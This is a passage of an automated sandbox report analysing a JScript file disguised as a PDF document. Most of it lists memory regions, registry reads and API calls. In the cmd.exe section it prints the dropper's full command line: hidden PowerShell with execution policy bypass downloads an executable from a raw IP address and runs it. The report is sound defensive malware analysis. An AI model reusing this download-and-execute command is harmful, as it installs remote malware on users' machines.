b4b6f6c2588001e5b95eed79faf99a92b9d9224f65af6a92e055ddfb145a1ecc (SHA256)
DOC6131166051-PDF.js
JScript
Created at 2018-03-14 01:58:00
Notifications (2/3)
Some extracted files may be missing in the report since the total file extraction size limit was reached during the analysis. You can increase the limit in the configuration settings.
Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.
Monitored Processes
Behavior Information - Sequential View
Process #1: cscript.exe
83
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\windows\system32\cscript.exe |
| Command Line | "C:\Windows\System32\CScript.exe" "C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS" |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:13, Reason: Analysis Target |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd7c |
| Parent PID | 0x4f8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D80
0x
DC8
0x
DEC
0x
E00
0x
E04
0x
E28
0x
E2C
0x
E30
0x
E50
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x00000025ab6e0000 | 0x25ab6e0000 | 0x25ab7dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025ab800000 | 0x25ab800000 | 0x25ab9fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025aba00000 | 0x25aba00000 | 0x25abafffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025abb00000 | 0x25abb00000 | 0x25abbfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025abc00000 | 0x25abc00000 | 0x25abcfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025abd00000 | 0x25abd00000 | 0x25abdfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025abe00000 | 0x25abe00000 | 0x25abefffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025abf00000 | 0x25abf00000 | 0x25abffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025ac000000 | 0x25ac000000 | 0x25ac0fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000025ac100000 | 0x25ac100000 | 0x25ac1fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002116f330000 | 0x2116f330000 | 0x2116f34ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002116f330000 | 0x2116f330000 | 0x2116f33ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002116f340000 | 0x2116f340000 | 0x2116f346fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002116f350000 | 0x2116f350000 | 0x2116f364fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f370000 | 0x2116f370000 | 0x2116f373fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f380000 | 0x2116f380000 | 0x2116f380fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002116f390000 | 0x2116f390000 | 0x2116f391fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x2116f3a0000 | 0x2116f45dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002116f460000 | 0x2116f460000 | 0x2116f466fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002116f470000 | 0x2116f470000 | 0x2116f471fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f480000 | 0x2116f480000 | 0x2116f480fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002116f490000 | 0x2116f490000 | 0x2116f490fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002116f4a0000 | 0x2116f4a0000 | 0x2116f4a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| cscript.exe | 0x2116f4b0000 | 0x2116f4b8fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000002116f4c0000 | 0x2116f4c0000 | 0x2116f4c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f4c0000 | 0x2116f4c0000 | 0x2116f4c3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f4d0000 | 0x2116f4d0000 | 0x2116f4d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f4e0000 | 0x2116f4e0000 | 0x2116f4e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f4f0000 | 0x2116f4f0000 | 0x2116f4f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002116f4f0000 | 0x2116f4f0000 | 0x2116f4fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002116f500000 | 0x2116f500000 | 0x2116f500fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| jscript.dll.mui | 0x2116f500000 | 0x2116f503fff | Memory Mapped File | Readable |
|
|
|
- |
| shell32.dll | 0x2116f510000 | 0x2116f51ffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002116f520000 | 0x2116f520000 | 0x2116f61ffff | Private Memory | Readable, Writable |
|
|
|
- |
| rpcss.dll | 0x2116f620000 | 0x2116f6fcfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000002116f620000 | 0x2116f620000 | 0x2116f6dbfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| stdole2.tlb | 0x2116f6e0000 | 0x2116f6e4fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000002116f6f0000 | 0x2116f6f0000 | 0x2116f6f0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x2116f700000 | 0x2116f703fff | Memory Mapped File | Readable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db | 0x2116f710000 | 0x2116f754fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x2116f760000 | 0x2116f763fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002116f770000 | 0x2116f770000 | 0x2116f77ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002116f780000 | 0x2116f780000 | 0x2116f907fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116f910000 | 0x2116f910000 | 0x2116fa90fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002116faa0000 | 0x2116faa0000 | 0x21170e9ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000021170ea0000 | 0x21170ea0000 | 0x2117129afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000211712a0000 | 0x211712a0000 | 0x2117147ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000211712a0000 | 0x211712a0000 | 0x2117139ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x211713a0000 | 0x2117142dfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000021171430000 | 0x21171430000 | 0x21171430fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000023.db | 0x21171440000 | 0x2117145cfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000021171460000 | 0x21171460000 | 0x21171460fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000021171470000 | 0x21171470000 | 0x2117147ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x21171480000 | 0x211717b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000211717c0000 | 0x211717c0000 | 0x211727bffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| rpcss.dll | 0x211717c0000 | 0x2117189cfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00007df5ff070000 | 0x7df5ff070000 | 0x7ff5ff06ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff6c8f20000 | 0x7ff6c8f20000 | 0x7ff6c901ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff6c9020000 | 0x7ff6c9020000 | 0x7ff6c9042fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cscript.exe | 0x7ff6ca030000 | 0x7ff6ca05efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| jscript.dll | 0x7ffbfc920000 | 0x7ffbfc9e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| scrobj.dll | 0x7ffbfdde0000 | 0x7ffbfde23fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldp.dll | 0x7ffc049f0000 | 0x7ffc049fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x7ffc079e0000 | 0x7ffc07b97fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7ffc08000000 | 0x7ffc08009fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mpr.dll | 0x7ffc0c050000 | 0x7ffc0c06afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x7ffc0d740000 | 0x7ffc0dac1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pcacli.dll | 0x7ffc0faa0000 | 0x7ffc0faaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshext.dll | 0x7ffc0fab0000 | 0x7ffc0facdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msisip.dll | 0x7ffc0fad0000 | 0x7ffc0fadbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| amsi.dll | 0x7ffc0fae0000 | 0x7ffc0faeffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| actxprxy.dll | 0x7ffc110f0000 | 0x7ffc11582fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x7ffc119f0000 | 0x7ffc11a11fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7ffc11ef0000 | 0x7ffc12075fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7ffc123a0000 | 0x7ffc12435fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7ffc13030000 | 0x7ffc13063fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7ffc133a0000 | 0x7ffc133b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7ffc134c0000 | 0x7ffc134cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7ffc136a0000 | 0x7ffc136ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sxs.dll | 0x7ffc138b0000 | 0x7ffc13948fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x7ffc13950000 | 0x7ffc13978fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7ffc13a20000 | 0x7ffc13a33fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x7ffc13a40000 | 0x7ffc13a8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x7ffc13a90000 | 0x7ffc13a9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc13aa0000 | 0x7ffc13aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wintrust.dll | 0x7ffc13bf0000 | 0x7ffc13c44fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| windows.storage.dll | 0x7ffc13c50000 | 0x7ffc14293fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x7ffc142c0000 | 0x7ffc14486fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc14490000 | 0x7ffc144d2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc144e0000 | 0x7ffc14549fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ffc14550000 | 0x7ffc14737fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x7ffc14740000 | 0x7ffc147f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7ffc14800000 | 0x7ffc14942fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7ffc14950000 | 0x7ffc14a6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7ffc14a70000 | 0x7ffc15fcefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x7ffc15fd0000 | 0x7ffc1624cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7ffc16250000 | 0x7ffc162f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ffc164b0000 | 0x7ffc1654cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7ffc16550000 | 0x7ffc165f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7ffc16660000 | 0x7ffc166bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7ffc167d0000 | 0x7ffc1680afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7ffc16810000 | 0x7ffc16969fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7ffc169e0000 | 0x7ffc16b65fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7ffc16fb0000 | 0x7ffc17070fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ffc17120000 | 0x7ffc171ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x7ffc171d0000 | 0x7ffc17325fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| coml2.dll | 0x7ffc17330000 | 0x7ffc1739efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7ffc173a0000 | 0x7ffc173f1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x7ffc17400000 | 0x7ffc175c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
Threads
Thread 0xd80
82
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff6ca030000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x7ffc17120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffc17143270 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 144, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 144, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 144, type = REG_NONE |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x7ffc17120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7ffc17147430 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\system32\cscript.exe, process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 110 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\.JS |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\.JS, data = JSFile, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ |
|
1 | |
| COM | Create | interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0 |
|
1 | |
| Module | Load | module_name = amsi.dll, base_address = 0x7ffc0fae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffc0fae2260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffc0fae26b0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffc14550000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540 |
|
1 | |
| COM | Create | interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Environment | Get Environment String | name = JS_PROFILER |
|
1 | |
| COM | Create | interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 97921 |
|
2 | |
| File | Create | filename = C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS, type = size |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS, filename = C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS, protection = PAGE_READONLY, maximum_size = 3717 |
|
1 | |
| Module | Map | C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS, process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\cscript.exe |
|
1 | |
| Module | Load | module_name = WLDP.DLL, base_address = 0x7ffc049f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x7ffc049f1010 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wldp.dll, function = WldpIsClassInApprovedList, address_out = 0x7ffc049f37b0 |
|
1 | |
| System | Get Info | type = System Directory |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Module | Load | module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7ffc16250000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7ffc1625ac70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7ffc16262db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7ffc16266290 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | type = size |
|
1 | |
| File | Read | size = 3717, size_out = 3717 |
|
1 | |
| COM | Create | interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| COM | Get Class ID | cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = ShEll.aPplIcAtiON |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Process | Create | process_name = Cmd.exe, show_window = 161790939264 |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0xdec
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Window | Create | class_name = WSH-Timer, wndproc_parameter = 2273907775344 |
|
1 |
Process #3: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','%appdAta%qTP35.exe'); staRt-ProceSS '%appdAta%qTP35.exe' |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe6c |
| Parent PID | 0xd7c (c:\windows\system32\cscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E70
0x
E94
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x0000009c45200000 | 0x9c45200000 | 0x9c453fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000009c45400000 | 0x9c45400000 | 0x9c454fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000009c45500000 | 0x9c45500000 | 0x9c455fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000244f38a0000 | 0x244f38a0000 | 0x244f38bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000244f38a0000 | 0x244f38a0000 | 0x244f38affff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000244f38b0000 | 0x244f38b0000 | 0x244f38b6fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000244f38c0000 | 0x244f38c0000 | 0x244f38d4fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000244f38e0000 | 0x244f38e0000 | 0x244f38e3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000244f38f0000 | 0x244f38f0000 | 0x244f38f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000244f3900000 | 0x244f3900000 | 0x244f3901fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000244f3910000 | 0x244f3910000 | 0x244f3916fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000244f3990000 | 0x244f3990000 | 0x244f3a8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x244f3a90000 | 0x244f3b4dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000244f3d30000 | 0x244f3d30000 | 0x244f3d3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x244f3d40000 | 0x244f4076fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00007df5ff180000 | 0x7df5ff180000 | 0x7ff5ff17ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff6b1930000 | 0x7ff6b1930000 | 0x7ff6b1a2ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff6b1a30000 | 0x7ff6b1a30000 | 0x7ff6b1a52fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cmd.exe | 0x7ff6b2520000 | 0x7ff6b2579fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ffc14550000 | 0x7ffc14737fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ffc164b0000 | 0x7ffc1654cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ffc17120000 | 0x7ffc171ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x7ffc17400000 | 0x7ffc175c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
Threads
Thread 0xe70
58
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff6b2520000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000 |
|
